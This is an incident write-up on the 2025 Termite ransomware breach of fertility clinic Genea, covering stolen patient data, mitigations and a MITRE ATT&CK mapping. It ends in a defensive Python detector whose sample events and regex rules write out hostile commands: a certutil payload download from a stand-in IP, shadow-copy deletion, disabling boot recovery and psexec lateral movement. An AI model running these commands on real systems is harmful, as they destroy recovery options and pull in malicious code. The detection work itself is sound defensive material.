Genea Fertility Clinic Ransomware Attack (2025)
(Image: Genea Fertility Clinic)
On 21 February 2025, Genea, one of the largest fertility clinics in Australia, disclosed that it had identified suspicious activity on its network dating from 14 February. The clinic launched an investigation while working to keep its services, which have operated for around 40 years, running without disruption.

On 26 February, the investigation confirmed that the threat actors had begun publishing data stolen from the Genea Patient Management System.
The Termite ransomware gang claimed responsibility for the attack and claimed to hold around 700 GB of data taken from the Genea Patient Management System. According to the investigation, the stolen data includes highly sensitive information such as:

- Full names, email addresses, addresses and phone numbers
- Medicare card numbers, private health insurance details and Defense DA numbers
- Medical record numbers, patient numbers and dates of birth
- Medical history, diagnoses and treatments
- Medications and prescriptions
- Patient health questionnaires
- Pathology and diagnostic test results
- Notes from doctors and specialists
- Appointment details and schedules
- Emergency contacts and next of kin

The exact information exposed differs from individual to individual.
Termite Ransomware Gang
The Termite group has made a name for itself quickly. It also claimed responsibility for the November 2024 cyber-attack on Blue Yonder, a supply chain management software company, and has been linked to attacks exploiting zero-day vulnerabilities in Cleo file transfer products.

The group uses a modified version of an older ransomware strain, Babuk, which has been on the radar of law enforcement for some time. In 2023, the US Department of Justice indicted a Russian national for using several ransomware variants, including modified Babuk, against victims in multiple sectors, including law enforcement agencies in Washington, D.C. and New Jersey, as well as healthcare organisations and other victims nationwide.
“Babuk encryptor was leaked in September 2021. The builder is basically just the source code so that anyone can compile the encryption tool and run their own ransomware campaign.” (Aaron Walton, Threat Intelligence Analyst)
Termite's operating procedure combines traditional ransomware techniques with some modernised tactics to maximise both disruption and financial gain. Its modus operandi matches that of other double-extortion ransomware groups:

- Exfiltrating sensitive information before encryption
- Encrypting the victim's data

Holding both the stolen data and the decryption keys gives the group two separate levers in its extortion efforts: a victim that can restore from backup can still be pressured by the threat of publication.
Termite has established a global presence quickly. Its known victims are concentrated in the United States, Canada, France, Germany, Oman and Cyprus, and span a range of industries, which shows the group's ability to adapt to different sectors and regions.
Mitigation and Precaution:
- Regular Patch Management: Keep software up to date with the latest security patches, since these close the known vulnerabilities that ransomware operators exploit for initial access. In particular, organisations running Cleo file transfer products should apply the vendor-recommended patches, given Termite's reported exploitation of those products.
- Advanced Threat Detection: EDR (Endpoint Detection and Response) solutions can monitor endpoints for suspicious activity, alert on known IoCs (Indicators of Compromise), and contain affected hosts. Integration with SIEM, SOAR and NAC tooling turns individual detections into coordinated response across the infrastructure.
- Access Control: Strict, least-privilege access control limits who and what can reach sensitive datasets such as a patient management system, and makes unauthorised access easier to detect and to contain.
- Incident Response Plan: A tested incident response plan is what turns a detection into an effective response. A well-tuned SIEM supports this by correlating events across systems so that unknown or suspicious activity can be triaged and stopped quickly.
- Backup and Recovery Plan: Security practitioners recommend keeping offline (or otherwise isolated) backups and regularly testing restores. Ransomware operators routinely delete shadow copies and reachable backups before encrypting (Inhibit System Recovery, T1490 in the table below), so backups that the compromised network can reach may not survive. In Genea's case the encrypted data set was large and highly sensitive to its patients, which makes a tested recovery plan central to post-attack measures.
- Email Security and Awareness: Email security controls block many phishing attempts and so restrict a common route to initial access. Employee awareness is needed as well, so that vulnerable points are not left unattended or unmitigated; a regular (weekly or monthly) awareness programme adds real value.
- Network Segmentation: Segmenting the network limits lateral movement and the reach of privilege escalation, and isolates departments from one another even in a small organisation. In the Genea incident, payment data was reportedly not among the data that appeared on the dark web, which may suggest that segmentation limited the attacker's reach, although the patient management system itself was compromised. This is why segmentation is consistently recommended by security experts.
Mapped to the MITRE ATT&CK framework, Termite ransomware's reported tactics, techniques, and procedures (TTPs) are:

| Tactic | Technique ID | Technique Name |
|---|---|---|
| Execution | T1204.002 | User Execution: Malicious File |
| Defense Evasion | T1070.004 | Indicator Removal: File Deletion |
| Discovery | T1083 | File and Directory Discovery |
| Lateral Movement | T1021 | Remote Services |
| Privilege Escalation | T1078 | Valid Accounts |
| Discovery | T1135 | Network Share Discovery |
| Command and Control | T1105 | Ingress Tool Transfer |
| Impact | T1486 | Data Encrypted for Impact |
| Impact | T1490 | Inhibit System Recovery |
This mapping helps defenders understand how the threat actors operate. Each technique in the table is a candidate for detection and monitoring coverage. If your SOC already has visibility into these TTPs, make sure the alerts feed a plan to protect the organisation's infrastructure; if it does not, the table is a starting point for closing those gaps.
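As an added example (not code from the original page, and not attributed to Termite), the following Python script maps process command lines to the command-line-observable techniques in the table above: T1083, T1135, T1021, T1105, T1070.004 and T1490. The regex patterns are generic, commonly seen commands for each technique rather than Termite's exact tooling (an assumption), and the host names, user names, command lines and the 198.51.100.23 address in `SAMPLE_EVENTS` are constructed for the example, not real logs from the Genea incident. Techniques that are not visible in a command line (T1204.002, T1078, T1486) are left to other data sources.

```python
"""Map process command lines to the ATT&CK techniques listed in the table.

Added example: the rules are generic command patterns for each technique
(an assumption, not commands the page attributes to Termite), and the
sample events below are constructed, not real logs from the Genea incident.
"""
import re

# (technique ID, tactic, technique name, case-insensitive regex over the command line)
RULES = [
    ("T1490", "Impact", "Inhibit System Recovery",
     r"vssadmin(\.exe)?\s+delete\s+shadows"
     r"|wmic(\.exe)?\s+shadowcopy\s+delete"
     r"|bcdedit(\.exe)?\s.*recoveryenabled\s+no"
     r"|wbadmin(\.exe)?\s+delete\s+catalog"),
    ("T1070.004", "Defense Evasion", "Indicator Removal: File Deletion",
     r"\bdel\s+(/[a-z]\s+)*.*\.(exe|bat|ps1|log)\b"
     r"|remove-item\b.*-recurse"),
    ("T1083", "Discovery", "File and Directory Discovery",
     r"\bdir\b.*\s/s\b|\btree\b|get-childitem\b.*-recurse"),
    ("T1135", "Discovery", "Network Share Discovery",
     r"\bnet1?(\.exe)?\s+(view|share)\b|get-smbshare"),
    ("T1021", "Lateral Movement", "Remote Services",
     r"psexec|wmic(\.exe)?\s+/node:|winrs\s+-r:|enter-pssession"
     r"|invoke-command\b.*-computername"),
    ("T1105", "Command and Control", "Ingress Tool Transfer",
     r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s+/transfer"
     r"|downloadfile|downloadstring|invoke-webrequest|\biwr\b"
     r"|curl(\.exe)?\s.*\s-o\s"),
]
COMPILED = [(tid, tactic, name, re.compile(rx, re.IGNORECASE))
            for tid, tactic, name, rx in RULES]

# Constructed sample process-creation events: (host, user, command line).
SAMPLE_EVENTS = [
    ("ws-017", "jdoe", r'"C:\Windows\System32\cmd.exe" /c dir /s C:\Users\jdoe\Documents'),
    ("ws-017", "jdoe", r"net view \\fileserver01"),
    ("ws-017", "jdoe", r"certutil.exe -urlcache -split -f http://198.51.100.23/t.exe C:\Users\Public\t.exe"),
    ("fs-01", "svc_backup", r"psexec.exe \\fs-02 -s cmd.exe"),
    ("fs-01", "svc_backup", r"vssadmin.exe delete shadows /all /quiet"),
    ("fs-01", "svc_backup", r"bcdedit /set {default} recoveryenabled no"),
    ("fs-01", "svc_backup", r"cmd.exe /c del /f /q C:\Users\Public\t.exe"),
    ("ws-022", "asmith", r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'),
]


def classify(cmdline):
    """Return [(technique ID, technique name)] for every rule matching the command line."""
    return [(tid, name) for tid, _tactic, name, rx in COMPILED if rx.search(cmdline)]


def scan(events):
    """Return one hit per (event, technique) match, in event order."""
    hits = []
    for host, user, cmdline in events:
        for tid, name in classify(cmdline):
            hits.append({"host": host, "user": user, "technique": tid,
                         "name": name, "cmdline": cmdline})
    return hits


def distinct_techniques_per_host(hits):
    """Count distinct techniques per host. A single match is noise-prone (an
    admin running `net view` is normal); a host that trips discovery, then
    lateral movement or tool transfer, then recovery inhibition is the chain
    from the table and deserves an incident, not a ticket."""
    per_host = {}
    for h in hits:
        per_host.setdefault(h["host"], set()).add(h["technique"])
    return {host: len(techs) for host, techs in per_host.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for h in found:
        print(f'{h["host"]:7} {h["user"]:11} {h["technique"]:10} {h["name"]}: {h["cmdline"]}')
    print("distinct techniques per host:", distinct_techniques_per_host(found))
```

On the constructed events, the workstation trips three techniques (discovery, share enumeration, tool download) and the file server trips three more (remote execution, two recovery-inhibition commands, self-deletion of the dropped tool), while the Word launch produces nothing. In a real deployment the rules would be fed from EDR or Sysmon process-creation events and tuned against the baseline of legitimate administrative activity, with the per-host technique count driving escalation rather than any single match.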